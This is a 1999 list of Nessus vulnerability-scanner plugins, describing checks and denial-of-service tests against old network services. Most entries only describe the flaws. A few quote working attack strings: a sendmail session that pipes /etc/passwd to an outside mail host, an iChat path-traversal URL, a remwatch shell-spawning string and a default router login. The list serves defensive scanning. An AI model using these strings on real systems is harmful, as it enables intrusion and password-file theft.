The Nessus Plugin List



Last update : Wed Feb 10 01:00:00 CET 1999


CategoryNameSummaryDescriptionCopyright
Denial of ServiceMicrosoft Personnal Web Serverperforms a denial of service against MSPersonal Web ServerIt is possible to crash Microsoft Personnal Web Server by sending it a too long string. The MacOS 8.5.1 web sharing is affected too.
Risk factor : medium/high
discovered by Gurney Halleck
Attackphfdetermines the presence of the 'phf' cgiThe 'phf' cgi allow a remote user to execute any command on the target system with the same privileges as the web server
Risk factor : High
no copyright
Information gatheringSendmail EXPNsendmail EXPN and VRFY exploitSendmail should not allow a remote user to perform EXPN or VRFY commands, since it can give away some interesting informations. This plugin determines if the remote sendmail allow those commands
Risk factor : low
no copyright
Attackcampasdetermines the presence of the 'campas' cgiThe 'campas' cgi allows a remote user to view any file on the local system, with the privileges of the http daemon (root or nobody).
This plugin determines if this cgi is installed on the remote host and tries to read a file (specified in the daemon preferences) on the remote server
Risk factor : medium/high
no copyright
Information gatheringfinger featuresdetermines if fingerd sends the list of the unused accounts of the remote systemThis plugin determines whether there's a hole in the fingerd daemon of a remote host, allowing a remote user to gain the list of the users\ who have never logged in the remote system -- this is of some interest to a darkside hacker who may know which accounts are never used and try to force them, since they are not monitored
Risk factor : medium/high
no copyright
Attackglimpsedetermines the presence of the 'glimpse' cgiThis plugin determines whether the 'glimpse' cgi is installed This cgi allows a remote user execute any commands on the server
Risk factor : high
no copyright
Attackhandlerdetermines the presence of the bug of the 'handler' cgiThis plugin determines whether a bug of the 'handler' cgi is present on a remote host. This bug allows a remote user to execute any command on the server Risk factor : highno copyright
Attackhtmlscriptdetermines the presence of the 'htmlscript' cgiThis plugin determines whether the 'htmlscript' cgi in installed This cgi allows a remote user to view any file on a given host
Risk factor : medium/high
no copyright
Information gatheringicatdetermines the presence of the 'icat' cgiThis plugin determines the presence of the 'icat' cgi Some versions of this cgi allows a remote user to view any file on a WindowsNT system
Risk factor : medium/high
no copyright
Information gatheringimap buffer overflowimap buffer overflowThere's a bug on some versions of Imap which allow a remote user to become root using a buffer overflow This plugin determines if the remote imap is subject to this attack
Risk factor : high
no copyright
Attackin.fingerd '|command@@host' bugdetermines if in.fingerd is exploitableSome versions of in.fingerd allow a remote user to execute arbitrary commands on a remote host. This plugin tries to execute '/bin/id'
Risk factor : high
no copyright
Information gatheringinn buffer overflowdetermines if inn is vulnerableThis plugin determines whether inn is vulnerable Some old version on inn may be exploited using a remote buffer overflow
Risk factor : high
no copyright
Information gatheringSendmail standard vulnerabilities testergets infos about sendmailA lot of security holes have been found in sendmailno copyright
Attackphpdetermines the presence of the 'php' cgiThe 'php' cgi allow a remote user to read any file on the target system with the same privileges as the web server.
Risk factor : High
no copyright
Attackremwatchremwatch exploit (hpux)Some versions of the 'remwatch' daemon allow may spawn a shell with the root priviledges if the string '11T ;/bin/ksh' is entered
Risk factor : High
no copyright
Denial of Servicelanddenial of service using the 'land' attackSome implementations of TCP/IP are vulnerable to packets that are crafted in a particular way (a SYN packet in which the source address and port are the same as the destination--i.e., spoofed). This plugin tries to crash a remote host using this attack
Risk factor : high
M3lt, FLC
Attackftp writeable rootattempts to write on the root of a remote ftp serverIt is sometime possible to write on the root dir of a remote ftp server, which is a real problem since any hacker can upload a '.forward' or '.rhosts' file and then get a shell easily
Risk factor : high
no copyright
Attackwebdistdetermines the presence of the 'webdist' cgiDetermination of the presence of the 'webdist' cgino copyright
Attackwebgaisdetermines the presence of the 'webgais' cgiDetermination of the presence of the 'webgais' cgino copyright
Attackwebsendmaildetermines the presence of the 'websendmail' cgiDetermination of the presence of the 'websendmail' cgino copyright
Denial of ServiceLivingston PortMaster crashcrashes a Livingston PortMasterIt is possible to crash a remote Livingston PortMaster by overflowing its buffers.
Risk factor : high
no copyright
Attackpfdispalydetermines the presence of the 'pfdispaly' cgiThe 'pfdispaly' cgi allow a remote user to read any file on the remote workstation
Risk factor : high
no copyright
Information gatheringStandard System holesunderlines little holes of a newly installed systemUnderlines little holes of a newly installed system Most newly installed system have some 'standard' ports opens, that are no use to anyone except the intrudersno copyright
Denial of ServiceNT RAS PPTPWindowNT DoSKevin Wormington
Denial of Servicemdaemonbuffer overflow for MDaemon SMTP serverIt is possible to crash a remote MDaemon SMTP server by sending it a string which is too long. Once it's crashed, MDaemon must be restarted by hands, and the workstation can't receive mails
Risk factor : medium/high
no copyright
Denial of Servicepnserver DoSattempts to crash PN Real Video Server It's possible to crash some versions of the Progressive Networks Real Video Server by sending it some garbage.
Risk Factor : Medium
no copyright
AttackEWS (Excite for Web Servers) CGI holedetermines the presence of the 'phf' cgiAn EWS cgi allows a remote user to execute any command on the target system with the same privileges as the web server
Risk factor : High
found by Marc Merlin
AttackBIND buffer overrundetermines if BIND can be attacked by a buffer overflowBIND 4.9 releases prior to BIND 4.9.7 and BIND 8 releases prior to 8.1.2 do not properly bounds check a memory copy when responding to an inverse query request. An improperly or maliciously formatted inverse query on a TCP stream can crash the server or allow an attacker to gain root
privileges. This plugin determines if your BIND daemon can be affected by such an attack without actually gaining root access.
Risk factor : high
Original code by Joshua J. Drake (jdrake@@pulsar.net)
Denial of Serviceslmailbuffer overflow for the SLMail SMTP serverSLMail SMTP server for WindowsNT buffer overflow exploitno copyright
Attackphp-cgi buffer overflowoverflows the buffer of the remote 'php' cgiSome versions of the 'php' cgi can be overflowed thus allowing a remote user to execute arbitrary commands on the remote host. This plugin checks if the remote php is can be attacked this way Risk factor : Highno copyright
Information gatheringwingatenotifies the user whether wingate is runningThis plugin notifies the user that wingate is installed on a remote machineno copyright
Attackinfo2wwwdetermines the presence of the 'info2www' cgiThis plugin determines whether the 'info2www' cgi is installed on a remote computer. This cgi allows a remote user to execute any command on a given server
Risk factor : high
no copyright
Information gatheringsearch.**@@host cfingerd featuredetermines if cfingerd sends the list of users of the remote systemThere is a bug in the cfingerd daemon which allow a remote user to get the list of all the users of the vulnerable system. This information may be of some help to a darkside hacker
Risk factor : medium-high
no copyright
Information gatheringfingerdetermines the presence of the 'finger' cgiThis plugins determines whether the 'finger' cgi is installed This cgi may lead to a denial of service of a remote server and may give some interesting informations to an intruder Risk factor : medium/highno copyright
Information gatheringtest-cgidetermines the presence of the 'test-cgi' cgiDetermination of the presence of the 'test-cgi' cgino copyright
Denial of Servicerecursive fingerdenial of service using finger root@@@@@@@@(...)@@hostIt is possible to lead to a denial of service using the recursive finger method, which consists in sending to the remote host a finger request containing a lot of '@@'
Risk factor : Medium
no copyright
Denial of Serviceircd killerattempts to crash ircdThis plugin tries to crash a remote ircd server by sending it a very long string Risk factor : mediumoriginal code by fx of nnh (aaron@@ug.cs.dal.ca)
Attackwu-ftpd 'site exec' bugchecks if the 'site exec' bug of wu-ftpd is presentSome wu-ftpd daemons are subject to the 'site exec' bug which allow a local user to gain root priviledges This plugin determines if the remote ftp server is subject to this bug
Risk factor : medium (remotely) / high (locally)
no copyright
Information gatheringNULL Linux ftp backdoorchecks if the user NULL backdoor is present on the remote ftpdThere was a backdoor in the old ftp daemons of Linux, which allowed a remote user to log in with the username 'NULL', and then have the root privileges over FTP This plugin determines if it is present on the remote host
Risk factor : high
no copyright
Information gatheringWindows NT ftp 'guest' accountchecks if there's a 'guest' account on the remote WindowsNT ftp serverThis plugin determines whether the 'guest' account of a remote WindowsNT box has been disabledno copyright
Denial of ServiceServ-U 'CWD' denial of servicecrashes a remote Serv-U FTP serverThis plugin attempts to crash a remote Serv-U FTP server by issuing a CWD command with a long dir name Risk factor : High/Mediumno copyright
Information gatheringWFTP (Windows FTP server) login checkchecks if WFTP accepts bogus loginsThis plugin determines whether the remote ftp daemon accepts connections with any username/password, (ie : an old version of WFTP)no copyright
Attackftp real pathattempts to get the real path to the remote ftp homeIt is possible to get the real path to the ftp home by issuing the 'CWD' command This information may be of some interest to an intruder who know where to put a '.rhosts' file
Risk factor : low
no copyright
Denial of Serviceteardropfragments overlap denial of serviceSome implementations of the TCP/IP IP fragmentation re-assembly code do not properly handle overlapping IP fragments. Teardrop is a widely available attack tool that exploits this vulnerability.
Risk factor : high
Copyright (c) 1997 route|daemon9
Denial of Servicespingdenial of service using the ping of deathCert Advisory CA-96.26 : The TCP/IP specification (the basis for many protocols used on the Internet) allows for a maximum packet size of up to 65536 octets (1 octet = 8 bits of data), containing a minimum of 20 octets of IP header information and 0 or more octets of optional information, with the rest of the packet being data. It is known that some systems will react in an unpredictable fashion when receiving oversized IP packets. Reports indicate a range of reactions including crashing, freezing, and rebooting.
In particular, the reports received by the CERT Coordination Center indicate that Internet Control Message Protocol (ICMP) packets issued via the "ping\subset of the TCP/IP suite of protocols that transmits error and control messages between systems. Two specific instances of the ICMP are the ICMP ECHO_REQUEST and ICMP ECHO_RESPONSE datagrams. These two instances can be used by a local host to determine whether a remote system is reachable via the network; this is commonly achieved using the "ping\Discussion in public forums has centered around the use of the "ping\command to construct oversized ICMP datagrams (which are encapsulated within an IP packet). Many ping implementations by default send ICMP datagrams consisting only of the 8 octets of ICMP header information but allow the user to specify a larger packet size if desired.
You can read more information about this vulnerability on Mike Bremford's Web page. (Note that this is not a CERT/CC maintained page. We provide the URL here for your convenience.)
http://www.sophist.demon.co.uk/ping/index.html
Jeff w.Roberson
Attacknfs world exportcheck if a host exports a filesystem to anyoneSome servers exports any file to anybody, and it's usually not a good thing to do
Risk factor : high
no copyright
Denial of Serviceascend killreboots an ascend routerIt is possible to reboot an ascend router by sending it a specially constructed UDP packet on the discard port (9). Risk factor : highrootshell
Denial of ServicewinnukeWindows denial of service using OOB msg on port 139This plugin sends a message out of band to the port 139 of a Windows95 machine, and attempts to crash itno copyright
Information gatheringCount.cgi (wwwcount)determines the presence of the 'Count.cgi' (wwwcount)The 'count.cgi' cgi is subject to a bug which allow a remote user to execute arbitrary commands on the attacked host
Risk factor : high
no copyright
Information gatheringX11-CheckerDetermines if there is an X11-Server with disabled access control of the remote systemChecks, if there is an open X11-Server
Risk factor : high
Sebastian Schreiber, GPL
Denial of Servicenestea'off by one IP header' bugnestea is a variation of the teardrop attack which makes linux kernels die
Risk factor : high
Copyright (c) 4/16/98 humble of rhino9
Denial of Servicesunkillperforms a denial of service against a Solaris WorkstationThis plugin performs a denial of service against a Solaris Workstation, by flooding it with ^D while negociating a telnet sessiondiscovered by Jason Zapman II
Denial of ServiceOracle Webserver denial of serviceoverflows the buffer of the remote owsVersion 2.1 of Oracle Webserver can be lead to a denial of service if it is sent a too long string argument Risk factor : Mediumno copyright
Information gatheringnph-test-cgidetermines the presence of the 'nph-test-cgi' cgiDetermination of the presence of the 'nph-test-cgi' cgino copyright
Denial of ServiceWINS udp floodWINS denial of serviceSome WINS server don't like to be flooded with UDP packets, thus giving up and stopping their service
Risk factor : High
adapted from Holas, Ondxej
Information gatheringSendmail : 'debug' vulnerability testersendmail 'debug' exploitOn very old implementations of sendmail, the 'debug' option allow a remote user to execute arbitrary commands as root
Risk factor : High
no copyright
Information gatheringSendmail 'decode' vulnerability testersendmail 'decode' exploitIf '/etc/aliases' contains "|/usr/bin/uudecode\decode, write to any file onwed by daemon, if they can connect to sendmail daemon, can write to any file owned by any user.
Risk factor : High
no copyright
Information gatheringSendmail overwrite featuresend a mail to a fileSome versions of sendmail allow a remote user to send a mail directly to a non-root owned file. This feature can be used to overwrite a '.rhost' file of a user or whatever...
Risk factor : High
no copyright
Information gatheringSendmail : mail from: <|program>use a pipe to make sendmail execute a programSome versions of sendmail allow a remote user to use pipes in usernames, thus allowing him to execute remote commands as root. This exploit is very popular... A typical attack to get the password file is:
% telnet target.com 25 Trying 123.456.789.0... Connected to target.com Escape character is '^]'. 220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51 mail from: "|/bin/mail me@@myhost.com < /etc/passwd\250 "|/bin/mail me@@myhost.com < /etc/passwd\rcpt to: mickeymouse 550 mickeymouse... User unknown data 354 Enter mail, end with ".\. 250 Mail accepted quit Connection closed by foreign host.
Risk factor : High
no copyright
Information gatheringpop3 buffers overflowspop3 buffers overflowsThere's a bug on some versions of pop3d which allow a remote user to become root using a buffer overflow This plugin determines if the remote pop3d is subject to this attack
Risk factor : high
no copyright
Denial of ServiceIIS 'GET ../.. 'performs a denial of service against IISIt is possible to crash IIS by sending it the request 'GET ../..' Risk factor : medium/highNo copyright
Denial of ServiceBonkanother ip fragment denial of serviceVariation of Teardrop which crashes some Windows boxesbendi
AttackMicrosoft Frontpage exploitsplays with Microsoft Frontpage extensionsSome Microsoft Frontpage extensions allow remote users to view any file on the system and to overwrite those file If vulnerable, a site must quickly contact Microsoft for a patch
Risk factor : High
Written after a paper from pedward@@WEBCOM.COM
Denial of ServiceWindowsNT DNS QR denialperforms a denial of service against Windows NT DNS serverThe WindowsNT DNS service terminates abnormally when it receives an answer to a DNS query that was never made So any remote user can ause a denial of service on the DNS server
Risk factor : high
No copyright
Denial of ServiceWindowsNT DNS flood denialperforms a denial of service against Windows NT DNS serverIt is possile to crash some versions of WindowsNT DNS server by sending it a flood of characters The fix to this problem is in hotfixes-postSP3/dns-fix Risk factor : highNo copyright
Denial of ServiceChameleon SMTPd overflowbuffer overflow for the Chameleon SMTP serverChameleon SMTPd does not properly checks bounds of some string, and a remote user may force it to crash. This plugin only tests the 'HELP longtopic' exploit, although there are several others problemsproblems found by Anton Rager arager@@McGraw-Hill.com
Information gatheringin.ftpd PASS buffer overflowattempts to overflow a remote ftp serverIt is possible to overflow some in.ftpd deamons by sending a too long password. This may allow a remote intruder to execute arbitrary commands on the remote host.
Risk factor : high
no copyright
Information gatheringin.ftpd USER buffer overflowattempts to overflow a remote ftp serverIt is possible to overflow some in.ftpd deamons by sending a too long username. This may allow a remote intruder to execute arbitrary commands on the remote host.
Risk factor : high
no copyright
Information gatheringMotorola Cable router vulnerabilityChecks for a vulnerability in Motorola Cable modemsIt is sometimes possible to reconfigure a Motorola Cable router by connecting to it on port 1024 and using the good login/password (which is by default : 'cablecom/router') This plugin will attempt to connect to the remote host on port 1024 and will check if ever this vulnerability is presentdiscovered by January
Information gatheringqpopper buffer overflowqpopper buffer overflowThere's a bug on some versions of qpopper which allow a remote user to become root using a buffer overflow This plugin determines if the remote qpopper is subject to this attack
Risk factor : high
no copyright
Information gatheringlpd is activenotifies the user that lpd is availableSome badly configured line printer daemons (lpd) allow anyone to use the printer they are in charge of. This may allow an attacker to cause denials of service by filling the printer queue, or to waste paper and ink.
Risk factor : medium
no copyright
Denial of ServiceBNC overflowoverflows a buffer in a remote BNC serverSome older versions of BNC servers are vulnerable to a buffer overflow which may throw a shell account to an attacker running as the BNC uid The BNC server are usually used as iRC proxies This plugin attempts to connect on ports 9000 and 6666-6669 and sends a too long argument to the USER command. However, be warned that this plugin can be non-effective, since BNC can be run on any port. Risk factor : Medium/Highfound by SDI http://www.sekure.org
AttackMetaInfo serversRead everything using '../../' in the URLSeveral versions of MetaInfo servers allow remote users to read file they are not allowed to, by entering '../../' in the URL. Platform affected: WindowsNT Risk factor : Highdiscovered by Jeff Forristal
Information gatheringSSH Insertion attackchecks for the version SSH protocol used on a remote machineOlder versions of the SSH protocol are vulnerable to an 'insertion attack' This means that an attacker with access to the encrypted SSH stream may insert encrypted blocks in the stream that will decrypt to arbitrary commands to be executed on the SSH server.
Risk factor: High
Discovered by CORE SDI S.A
Attackftp cwd ~rootattempts to log in as rootThere is a bug in older versions of some FTP servers which would allow anonymous logins to be logged as root This plugin tries to see if this vulnerability is present on the remote ftp server Risk factor : highno copyright
Attackdefault system accountstelnet to the remote host and guess login/passwordsSeveral operating systems come with default accounts that have no or simple passwords. This plugin will attempt to connect to the remote host on the telnet port and will attempt to find those weak accountsno copyright
AttackWebSite 1.0 buffer overflowexecutes some code on a remote host running WebSite 1.0There is a buffer overflow in some WebSite 1.0 CGI scripts which allow a remote intruder to execute any command on the remote host Platform affected : WindowsNT Risk factor : Highno copyright
Information gatheringdumpenvchecks for the 'dumpenv' CGIThe dumpenv CGI is a cgi-script which is part of the Sambar server. It can give away several informations that don't need to be known to the public Risk factor : Low/Mediumno copyright
Attackuploader.exe problemuploads a file on the remote WebSite serverO'reilly's webserver 'website' contains a demopackage that contains the cgi-program uploader.exe. It's possible to use it to upload CGI-programs on the remote WebServer thus allowing an intruder to execute arbitrary commands remotely Platforms affected : WindowsNT, Windows95 Risk factor : Highfound by Herman de Vette
Denial of Servicewingate DoSperforms a denial of service against a wingate serverUnsecured Wingates happily connect to themselves. When they run out of buffers, they prevent anyone from using them Platform affected : Windows Risk factor : Mediumfound by Matt Carothers
Denial of ServiceAnnexcrashes an Annex terminal serverIt is possible to crash an Annex terminal server by sending a too long argument to the 'ping' CGI. Risk factor : Highfound by the Redes2 Security Team
Information gatheringwu_imapd buffer overflowwu-imapd buffer overflowCERT Advisory CA-98.09 - imapd : The CERT Coordination Center has received reports regarding a buffer overflow in some implementations of IMAP servers. The overflow is in library code from the University of Washington IMAP server that handles SASL server-level authentication. This vulnerability is different from the one discussed in CERT Advisory CA-97.09.imap_pop. Information about this vulnerability has been posted to various public mailing lists and newsgroups.
All versions of the University of Washington IMAP server prior to the final (frozen, non-beta) version of imap-4.1 that support SASL server-level authentication are vulnerable. The vulnerability affects all University of Washington IMAP4rev1 servers prior to v10.234. Also, any v10.234 server that was distributed with Pine 4.0 or any imap-4.1.BETA is vulnerable.
Additionally, the vulnerability is present in other IMAP servers that use library code from the University of Washington IMAP server to handle SASL server-level authentication.
Risk factor : high
no copyright
Information gatheringwu_imapd buffer overflowwu-imapd buffer overflowCERT Advisory CA-98.09 - imapd : The CERT Coordination Center has received reports regarding a buffer overflow in some implementations of IMAP servers. The overflow is in library code from the University of Washington IMAP server that handles SASL server-level authentication. This vulnerability is different from the one discussed in CERT Advisory CA-97.09.imap_pop. Information about this vulnerability has been posted to various public mailing lists and newsgroups.
All versions of the University of Washington IMAP server prior to the final (frozen, non-beta) version of imap-4.1 that support SASL server-level authentication are vulnerable. The vulnerability affects all University of Washington IMAP4rev1 servers prior to v10.234. Also, any v10.234 server that was distributed with Pine 4.0 or any imap-4.1.BETA is vulnerable.
Additionally, the vulnerability is present in other IMAP servers that use library code from the University of Washington IMAP server to handle SASL server-level authentication.
Risk factor : high
no copyright
Attackfaxsurveydetermines the presence of the 'faxsurvey' cgiThere exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command he wants with the permissions of the HTTP-Server.
Risk factor : High
found by Tom
Attackthttpddetermines if the remote thttpd allow anyone to read anythingVersions of the web server thttpd up to 2.03 (included) allow the remote intruders to read any files the thttpd server has the right to read, especially /etc/passwd
Risk factor : High
hole found by Mark Slemko
AttackiChatdetermines if iChat is vulnerable to a stupid bugiChat servers up to version 3.00 allow any remote user to view any file on the target system by doing the following request : http://chat.server.com:4080/../../../etc/passwd
Risk factor : High
no copyright
Information gatheringguess operating systemguesses the remote OSThis plugin attempts to guess the type of the remote operating system by looking at the telnet and ftp bannersno copyright
Attackftp misc. overflowsattempts to find some buffer overflows on a remote ftp serverSome FTP server do not check the length of arguments of several commands and can thus exploit potential buffer overflows. This plugin attempts to find which commands are subject to possible buffer overflows
Risk factor : high
no copyright
Attackstatdattempts to send a buffer overflow to statdThere's a bug on some 'statd' that allows a remote user to become root. Also, it is possible to create and remote any file on the remote system using this service Risk factor : highno copyright
Information gatheringPortmapper checkThe portmapper is the central program for RPC programs. If an attacker can connect to it, he can find which RPC services are running and can make a more accurate attack. Risk factor : Mediumno copyright
Information gatheringSendmail HELO overflowsend anonymous mailSome versions of sendmail have a bug that makes that mails sent by anybody who sent before a HELO string longer than about 1024 bytes wont have the additional info that sendmail stamps on the mail header such as the IP of the user who mailed it, the username of who did it and some more, because the long HELO name crops this info Risk factor : lowJavi Polo, GPL
Information gatheringfirewall icmp checklicensed under the GPL
Attackview_sourcedetermines the presence of the 'view-source' cgiThe 'view_source' cgi, shipped with some httpd distributions allow a remote user to view any file the httpd daemon has the right to read
Risk factor : High
no copyright
ScannerNmap tcp connect() scanTaken from Fyodor's Nmap
Attackftp bouncechecks if the remote ftp server can be bouncedIt is possible to force several FTP servers to connect to third parties hosts. This can be used by intruders to use your network resources to scan some other hosts, or it can be used to go through some firewalls Risk factor : highno copyright
Information gatheringanonymous ftp enabledchecks if the remote ftp server accepts anonymous loginsThe 'ftp' service may allow anonymous logins. If the server admin decides to let this service open to the whole world, he must configure it so that anyone can not read anything on its server
It is usually not a good idea to let a anon ftp server opened with no real reason, since many FTP attacks require the intruder to log in... Risk factor : high if the anonymous FTP is badly setted up low if it is well configured
no copyright
Attackcgi jjdetermines the presence of the 'jj' cgiThe 'jj' cgi allow a remote user to execute any command on the target system with the same privileges as the web server
Risk factor : High
no copyright
AttackTFTP get fileAttempts to grab a via through tftpThe TFTP (Trivial File Transfer Protocol) allows remote user to read file withour having to log in. This may be a big security flaw, especially if tftpd (the TFTP server) is not well configured by the admin of the remote host Risk factor : highno copyright
Attackftp PASV denial of serviceattempts to do a PASV dosSome FTP servers allow any user to make any number of PASV commands, thus blocking the free ports for legitimate services This plugin attempts to issue a given number of those commands
Risk factor : medium
no copyright
Information gatheringicmp broadcast checklicensed under the GPL
Attackftp get /etc/passwdthis plugin is distributed under the GPL
Attackftp writeable directoriesthis plugin is distributed under the GPL
AttackTooltalk presence checkCERT Advisory CA-98.11 : An implementation fault in the ToolTalk object database server allows a remote attacker to run arbitrary code as the superuser on hosts supporting the ToolTalk service. The affected program runs on many popular UNIX operating systems supporting CDE and some Open Windows installsno copyright
Information gatheringr-commands checkchecks the presence of the r-commands (rsh,rlogin...)Some people install a proxy which is supposed to act as a firewall, and feel safe, even though they have not disabled the r-commands (rlogin, rsh...) This plugin checks that the rservices of a firewall protected computer are unavailable
Risk factor : high
Licensed under the GPL
Attackperl interpreter can be launched as a CGIdetermines if the perl interpreter can be launched as a cgiSome badly configured web servers allow the users to execute the perl interpreter, which is not a good thing, since it is like giving a shell access to anyone. Removing the perl executable from the 'cgi-bin' directory solves this problem
Risk factor : high
no copyright
Information gatheringSendmail supports EHLOdetermines if the remote server supports EHLO greetingThe EHLO greeting indicates to sendmail to use ESMTP (Extended Simple Mail Transfer Protocol), which has additional vulnerabilities. Supporting it, and showing that sendmail supports it, may help an intruder to focus its efforts on a special weakness Risk factor : mediumdistributed under the GPL
Denial of Service+ + + ATH0 modem hangupmakes a modem hangupMost modems today follow the Hayes Command set (ATZ, ATDT, ATH0..) Unfortunately the way that these modems handle certain strings leaves them susceptible to a specific type of DoS attack. By forcing the victim to respond with the string "+ + +ATH0\modems will interpret the + + +ATH0 as the user manually attempting to enter command mode and execute a command. Because of this, when the victim attempts to respond with the + + +ATH0 the modem sees it within the IP datagram and hangs up the modem. It is also possible to make a remote modem hangup and then dial another number, forcing its owner to loose money Risk factor : mediummade after the bugtraq article of Max Schau (Noc-Wage)
Information gatheringauth enabledchecks if auth is enabledThe auth service provides sensitives informations to the intruders : it can be used to find out which accounts are running which servers. This may help attackers to focus on services that are worth hacking (those owned by root) If you do not use this service, disable it in /etc/inetd.conf. Risk factor: mediumdistrubuted under the GPL
AttackNIS serverdetermines if the remote host is a NIS serverThe NIS service is mainly used to share password files among the hosts of a given network. These files must not be intercepted by the intruders. The first step of their attack is to find out whether the host they are attacking is a NIS server. This plugin will attempt to see if the remote host is a NIS server.
Risk factor : medium
distributed under the GPL
Attackmountd overflowdetermines if the remote mountd may be overflowedSome versions of mountd can be overflowed remotely, giving root access to anyone. This plugin will not determine if the remote host is vulnerable, but just warns the user if the remote mountd accepts a too long argument Warning: this plugin may crash your mount daemon
Risk factor: high
based on LucySoft [ luci@@transart.ro ] exploit
Denial of ServiceWingate POP3 USER overflowcrash WingateWingate can crash if a user telnet to port 110 (POP3) on a machine running Wingate and try to login as "USER x#9999[a lot of 9's]\Risk factor : highPaco Brufal, GPL
AttackProxy CONNECT checkchecks for badly configured proxiesSome misconfigured proxy accepts the CONNECT requests of their clients, which is a very bad thing since it can allow anyone to bypass a firewall and to use the proxy as a launch pad for attacking another site Risk factor : very highRenaud Deraison
Information gatheringdaytime checkdetermines if daytime is activatedThis plugin determines if the daytime service is running. Sometimes, the date format issued by this service can help an intruder to guess the operating system of the remote host. This service is potentially vulnerable to spoofing attacks which can link the daytime port to the echo port consuming network bandwidth. You should disable this service if you do not use it Risk factor : lowno copyright
AttackNetscape Server ?PageServices bugmake a request like http://foo.bar.edu/?PageServicesRequesting an URL with '?PageServices' at its end makes some Netscape servers dump the listing of the page directory, thus showing potentially sensitive files Risk factor : Medium/Highno copyright
AttackRemote gopher server can be used as a proxychecks for a bad gopherdMost gopher servers accepts to act as a FTP proxy. Thus, sending a request like : ftp:any.ftp.site.com@@/ to the remote gopher server will make it act as a proxy. This vulnerability can be used by attackers to bypass your firewall (if the gopher server is trusted by the firewall). In addition to that, your host may server as a launch pad to attack some other sites via FTP You should also note that gopherd offers poor logging options Risk factor : very highRenaud Deraison
AttackBootparamd presence checkWhen a diskless client needs to boot, it uses the bootparam protocol to get the necessary information needed from the server. If bootparamd is running one can guess at which is the client and server or use a program such as bootparam_prot.x to determine which is which.
If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get it's NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap) Risk factor : High
no copyright
Attackpcnfsd sends the users listga
AttackNIS check domainThis plugin attempts to guess the remote NIS domain name. To do so, it retrieves the index of the remote NIS maps of the target. If it is successful, it means that you have incorrectly chosen your NIS domain name, and this is a problem since it allows remote attackers to get your NIS maps easily -- especially your passwd map.
Risk factor : High
code from Dan Farmer (zen@@death.corp.sun.com) and Casper Dik (casper@@fwi.uva.nl).
Attackpcnfsd sends the printers listga
AttackProxy POST checkchecks for badly configured proxies which accepts to redirect POSTSome misconfigured proxies accepts requests like POST http://somehost:25. This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if the remote proxy accepts POST requests going anywhere Risk factor : very highRenaud Deraison
AttackProxy GET checkchecks for badly configured proxiesSome misconfigured proxies accept requests like asking some non-WWW ports (ie: 25). This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if : a) The remote proxy accepts our requests (which may be a bad thing) b) The remote proxy accepts our requests on bogus ports If the remote proxy accepts requests on bogus ports, this may allow an attacker to bypass a firewall.
Risk factor : very high
Renaud Deraison
Attackpcnfsd warningno copyright
AttackBootparamd gives NIS domainWhen a diskless client needs to boot, it uses the bootparam protocol to get the necessary information needed from the server. If bootparamd is running one can guess at which is the client and server or use a program such as bootparam_prot.x to determine which is which.
If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get it's NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap) This plugin will attempt to retrieve the NIS domain name by giving to the remote bootparamd some computer names Risk factor : High
no copyright
Attackpfdispalydetermines the presence of the 'wrap' cgiWWW HTTP/1.0 Server, as shipped with IRIX 6.2 (at least in low end machines) includes a perl script (wrap) which allows anyone on the net to get a listing for any directory with mode +755. Risk factor : medium/highfound by J.A. Gutierrez
Attackllockmgr serviceno copyright
Information gatheringrexecd checkchecks for the precence of the rexec serviceBecause rexec uses unprivileged ports for the whole process, any user can send a request to a rexecd requesting connection of the stderr stream to an arbitrary port on the client machine. Since the client is unprivileged, there is no possibility for the legitimate stderr stream to be destined for a privileged port. In addition, spoofing techniques could allow the client to direct the stderr stream towards an arbitrary host as well as an arbitrary port, possibly exploiting a given trust model. Since rexecd terminates if the stderr port can't be connected to, and the port can be specified, rexecd can be used to easily scan the client host from the server host. Risk factor : mediumLicensed under the GPL
Attack3270 mapper serviceno copyright
AttackEtherstatd serviceno copyright
Attacknsed serviceno copyright
Attacknsemntd serviceno copyright
Attackypupdated servicefound by Avalon Security Research
Attackdatabase serviceno copyright
Attackalis serviceno copyright
Attackkeyserv serviceno copyright
Attacknlockmgr serviceno copyright
Attackstatmon serviceno copyright
Attackrexd serviceno copyright
Attackrje_mapper serviceno copyright
Attackrquotad serviceno copyright
Attackrstatd serviceno copyright
Attackrusersd serviceno copyright
Attacksched serviceno copyright
Attackselection serviceno copyright
Attacksprayd serviceno copyright
Attackshowfhd serviceno copyright
AttackSunlink mapper serviceno copyright
Attacktfsd serviceno copyright
Attackwalld serviceno copyright
Attackypxfrd serviceno copyright
Attackyppasswdd serviceno copyright
Attackypbind serviceno copyright
AttackX25 serviceno copyright
AttackSNMP serviceno copyright
Information gatheringicmp timestamp requestlicensed under the GPL
Information gatheringicmp netmask requestlicensed under the GPL
Denial of ServiceiPartyshuts down a remote iParty serveriParty is an audio/text chat program for Windows. The iParty server listens on a specified port (6004 is default) for client requests. If someone connects to the chat server and sends a large amount of ASCII 255 chars, the server will simply close itself and disconnect all the current users. Risk factor : Low/Mediumfound by HD Moore
Information gatheringHP Laserjet printer has no passwordnotifies the user that the remote printer has no passwordThis plugin attempts to see if the remote HP Laserjet printer has a password. A passwordless printer is a threat since it allows an attacker to change the printer's IP, thus resulting in creating network problems.no copyright
Information gatheringHP JetDirect TCP/IP problems: single threadchecks if anyone can cause a DoS of the printer via the single threaded architecture of the printerSee the ISS Security Advisory of the same name Basically, the older JetDirect interfaces have several problems. One of them is the fact that the HP JetDirect is single-threaded so when one of the ports is occupied, the other ports are unavailable. The consequence of this problem is that the printer can't emulate properly the spooler caracteristics. This can allow a malicious user to prevent other people from printing their work. Risk factor: Lowbased on the ISS Security Advisory of the same name
